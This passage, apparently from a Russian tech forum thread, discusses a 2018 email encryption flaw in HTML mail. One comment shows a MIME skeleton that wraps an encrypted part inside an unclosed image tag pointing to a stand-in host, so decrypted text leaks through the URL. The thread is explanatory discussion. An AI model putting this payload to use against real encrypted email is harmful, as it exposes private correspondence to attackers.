    [CODE]
    Content-Type: text/html
    <img src="https://foo.bar/
    --BOUNDARY--
    Content-Type: application/pksc7-mime:
    Foo:bar
    ENCRYPTED MSG // сюда можно подставить любое содержимое, т.е. из тех же текствоых писем
    --BOUNDARY--
    Content-Type: text/html
    ">
    --BOUNDARY--
    [/CODE]
    т.е. все достаточно  просто.  
    А JS все же обычно по умолчанию режется/отключен (вроде бы thunderbird с версии 3, аутлук, гмейл), из-за спама и прочих "радостей".

     
  • 1.99, Аноним (-), 20:37, 14/05/2018 [ответить] [показать ветку] [···]    [к модератору]  
  • +/
    > проблема касается только писем, переданных в формате HTML,

    А, ну это еще не так страшно.

     

     Добавить комментарий
    Имя:
    E-Mail:
    Заголовок:
    Текст:


      Закладки на сайте
      Проследить за страницей
    Created 1996-2018 by Maxim Chirkov  
    ДобавитьПоддержатьВебмастеруГИД  
    Hosting by Ihor